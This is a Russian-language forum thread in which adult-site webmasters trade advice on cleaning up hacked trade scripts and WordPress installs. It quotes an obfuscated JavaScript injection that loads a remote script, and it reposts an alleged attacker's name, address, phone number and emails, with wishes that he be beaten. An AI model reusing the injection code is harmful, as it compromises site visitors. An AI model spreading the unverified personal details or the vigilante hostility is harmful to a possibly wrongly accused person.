Master-X
Форум | Новости | Статьи
Главная » Форум » Читеры и Разгильдяи » 
Тема: Киргизский Хакер и взломы TP
цитата
13/02/12 в 06:18
 SkyKiller
X-dream, в этом файле прописываешь, с каких IP разрешено к тебе на сайт по FTP ходить. У меня, например, на хостинге прописано разрешение ходить по FTP только с моего домашнего компа и с наладонника. Так что, даже если у меня все пароли от FTP попиздят, то всё равно обломятся зайти.

У меня этот файл лежит в корне хостинга и имеет довольно простенький формат - разрешать заходить по FTP только мне:
Код:
<Limit ALL>
Allow from 123.112.221.223
Allow from 111.222.23.12
Deny from all
</Limit>


Дока по формату - здесь: http://peterhost.ru/wiki/.ftpaccess/
цитата
13/02/12 в 18:10
 X-dream
Хмм... Саппорт у TrafficRevenue.net оказался вполне вменяемым.
Я с них хочу компенсацию 1200 получить(товарищ говорит что я дурак и надо было сразу 100к предьявлять им) но потратил я 1200 уже и пусть все будет честно trollface.png .
Сказали что за всех своих 25000 адвертов не могут отвечать, но именно этого хакера забанят, дадут мне его данные + мыло пейпала если оно есть, а то что он успел на моих сайтах заработать заплатят мне icon_cool.gif trollface.png .....слабо верится что заплатят... да и похрен деньги....хочу наказать гандона, хоть както.
цитата
14/02/12 в 00:44
 eVan
через TP могли ломануть, проверь файл tpupdater.php должен быть около 15кб, если меньше в два раза, значит он.
цитата
14/02/12 в 06:58
 X-dream
remote_updater.php
filter.php
updater.php
tpupdater.php - 5kb
tools.php
vtop.php

вот эти все хакнуты. да и много еще файлов и пхп и хтмл

хм... из последних скриптов ставил FREE TP Version 1.0.8 build 43
цитата
14/02/12 в 13:32
 eVan
это один пидор с Киргизии ломает, слушай, если тебе дадут его данные, скинь мне их в личку плиз. и пиши kildoozer@scriptpulse.com, он знает что делать
цитата
14/02/12 в 15:24
 X-dream
eVan писал:
это один пидор с Киргизии ломает


хмм icon_cool.gif жду ответа от трафревеню...

а почему думаеш что один и тот же чел? на прошлые взломы тп ставили теже коды?
цитата
14/02/12 в 15:37
 eVan
да мы уже с ним месяца 3 точно бодаемся, тут вот топек на эту тему есть http://forum.scriptpulse.com/index.php/topic,1455.0.html
если есть возможность, то можно у хостеров логи посмотреть, с какого ip файлы менялись, у нас всегда с киргизского, и сам суппорт TP его уже хорошо знает, только никак адрес вычислить не может.
цитата
14/02/12 в 16:00
 X-dream
гы. пока саппорт дримхоста отвечает на тикет уже восьмой час facepalm.gif мне почистили и уже перенесли все сайты на дедик trollface.png осталось только днс сменить...

хз где дыра. от тп наверно придется временно отказатся.
цитата
14/02/12 в 17:19
 Assembler
есть подозрение, что переезд на дедик не поможет, т.к. бэкдоры рассованы по файлам, которые тоже переедут, и начнется по новой
цитата
15/02/12 в 12:13
 pexli


Берем свежую версию с офф сайта(если конечно сам офф сайт не взломан) сравниваем все файлъй и чистимся.Бабло приятно зарабатъвать,а вот платить за security никто не хочет.Прикольно.icon_smile.gif
цитата
17/02/12 в 07:48
 X-dream
eVan писал:
это один пидор с Киргизии ломает, слушай, если тебе дадут его данные, скинь мне их в личку плиз. и пиши kildoozer@scriptpulse.com, он знает что делать


Есть данные этого васи. И адрес и номер телефона. И мыло пейпала. Наверно данные левые, но то что есть...

Скинул в ЛС

Надеюсь его жестоко отпиздят и посадят.

зы - сюда запостить или не надо? trollface.png
цитата
17/02/12 в 08:32
 CrazyMen
Ха парни читаю тему и вижу ту же ситуацию что была год назад у меня и у других в топлистах. кому интересно найдите тему про взлом гб топов. да этот чертыла с киргизии его айпи я в тех темах светил. переезд не помогает. я все заново восстанавливал и сиджи и топы. тк код был везде и бекап восстанавливать бесполезно.
цитата
17/02/12 в 09:42
 X-dream
CrazyMen: это пиздец )) реально все вернулось... сцука. icon_confused.gif
цитата
17/02/12 в 09:46
 X-dream
TP которые на дедике не пострадали причем не обновлял их уже больше года, но там по ип закрыто и фаервол стоит.

а все что на дримхосте facepalm.gif
цитата
17/02/12 в 09:53
 X-dream
если все TP снесу (через ssh всю папку) то дыра исчезнет?
цитата
17/02/12 в 10:44
 pexli
Цитата:
если все TP снесу (через ssh всю папку) то дыра исчезнет?


Ага и есчо ТР исчезнет.icon_smile.gif
Почекай как я тебе вверху написал и вижу что по ИП уже закръл.
цитата
17/02/12 в 10:56
 X-dream
pexli писал:
Ага и есчо ТР исчезнет

icon_smile.gif ну это не критично, два, три сайта могут потерпеть без трейда. уже снес. сейчас wp обновляю, вроде помогает...

главное чтоб гугл не заметил icon_smile.gif и что дыра не в wp я надеюсь, а с секьюрити разберусь...
цитата
17/02/12 в 11:25
 pexli
WP софт х***й.
Лишних плагинов не ставить.
Админку по .htaccess закръть для посторонних
Upload и правка файлов через админку запретить.Все через фтп.
цитата
17/02/12 в 15:01
 CrazyMen
Я три раза все сносил и ставил заново. не помогло. код был прописан даже в тумбах я нашел только один выход от сюда - начать все с нуля. восстановил дизы дески пикчи нарезал снова... я тогда думал что брошу все после того как третий раз все восстанавливал, но потом все же нашел в себе силы восстановить пусть не все но хотя бы часть
цитата
17/02/12 в 15:31
 Lin
X-dream: а можешь сделать список плагинов и тем которые есть на блогах?
в самом вп редко баги серьезные бывают
цитата
17/02/12 в 16:28
 Дольчик ххх
X-dream у меня на ТР скрипте старой версии (того года), показывались поп ап окна, какой то рекламы и только, для американ айпи, в следствии чего траф подсел в раза два, но исправил ситуацию путем обновления до последний версии скрипта, а так же заказывал сторонюю поддержку, через шелл, на предмет выявления вирусов, и т.п. у софт кома! Вот так.. : )
цитата
17/02/12 в 17:34
 xDiver
Сейчас переношу с фрихостов купленные сайты так тоже обнаружил похожий код на сайтах icon_smile.gif

<script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg ynathntr=\"wninfpevcg\" fep=\"uggc://jjj.nyynop.pbz/vaqrk.cuc?ers=pbqr\"></fpevcg>"));</script>
а вот куда ведет он после расшифровки :
<script src="http://www.allabc.com/index.php?ref=code" language="javascript"/>
цитата
17/02/12 в 18:36
 CrazyMen
Парни вы ищите как он вас проломил, через что желательно. если сломали вас значит сломали и других. Отпишите овнерам скриптов что произшло и как быстрее это исправить иначе просто пистец настанет массовый. Если у кого ip хацкера есть скиньте плиз сравню он не он
цитата
17/02/12 в 18:37
 X-dream
Блять! Это нахуй эпидемия...
icon_smile.gif icon_cool.gif icon_neutral.gif
хуйня война...что не убивает - делает сильнее!
цитата
17/02/12 в 18:48
 X-dream
Цитата:
Цитата:

Hello.
Let me follow you up on this.
Here are account details:
Email: webex.post@gmail.com
PayPal email: nexxxen@gmail.com

What we have done:
1. The account "inj" has been banned.
2. All payments are blocked.
3. No ads for account "inj" will be displayed

I am also exchanging informations with another affected webmaster.
His email is kildoozer@gmail.com and his servers were hacked as well.
You may want to contact him to cooperate(he allowed me to provide you
his email).

Finally, by googling his email, I might have been able to get
additional details of the attacker:
http://xml.ssdsandbox.net/dnslookup-dnsdb/xtds.in.

Best regards,
Tomasz Klekot
TrafficRevenue



Цитата:

Domain ID:D4085859-AFIN
Domain Name:XTDS.IN
Created On:11-Mar-2010 11:58:54 UTC
Last Updated On:07-Feb-2012 21:15:13 UTC
Expiration Date:11-Mar-2013 11:58:54 UTC
Sponsoring Registrar:Directi Web Services Pvt. Ltd. (R118-AFIN)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:TS_11767501
Registrant Name:George Weber
Registrant Organization:N/A
Registrant Street1:Chuyskaya, 213
Registrant Street2:
Registrant Street3:
Registrant City:Osh
Registrant State/Province:Osh
Registrant Postal Code:720000
Registrant Country:KG
Registrant Phone:+996.502560888
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:webex.post@gmail.com
Admin ID:TS_11767501
Admin Name:George Weber
Admin Organization:N/A
Admin Street1:Chuyskaya, 213
Admin Street2:
Admin Street3:
Admin City:Osh
Admin State/Province:Osh
Admin Postal Code:720000
Admin Country:KG
Admin Phone:+996.502560888
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:webex.post@gmail.com
Tech ID:TS_11767501
Tech Name:George Weber
Tech Organization:N/A
Tech Street1:Chuyskaya, 213
Tech Street2:
Tech Street3:
Tech City:Osh
Tech State/Province:Osh
Tech Postal Code:720000
Tech Country:KG
Tech Phone:+996.502560888
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:webex.post@gmail.com
Name Server:GETNIC.MERCURY.ORDERBOX-DNS.COM
Name Server:GETNIC.VENUS.ORDERBOX-DNS.COM
Name Server:GETNIC.EARTH.ORDERBOX-DNS.COM
Name Server:GETNIC.MARS.ORDERBOX-DNS.COM
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC:Unsigned
Стр. « первая   <  1, 2, 3, 4  >  последняя »


Эта страница в полной версии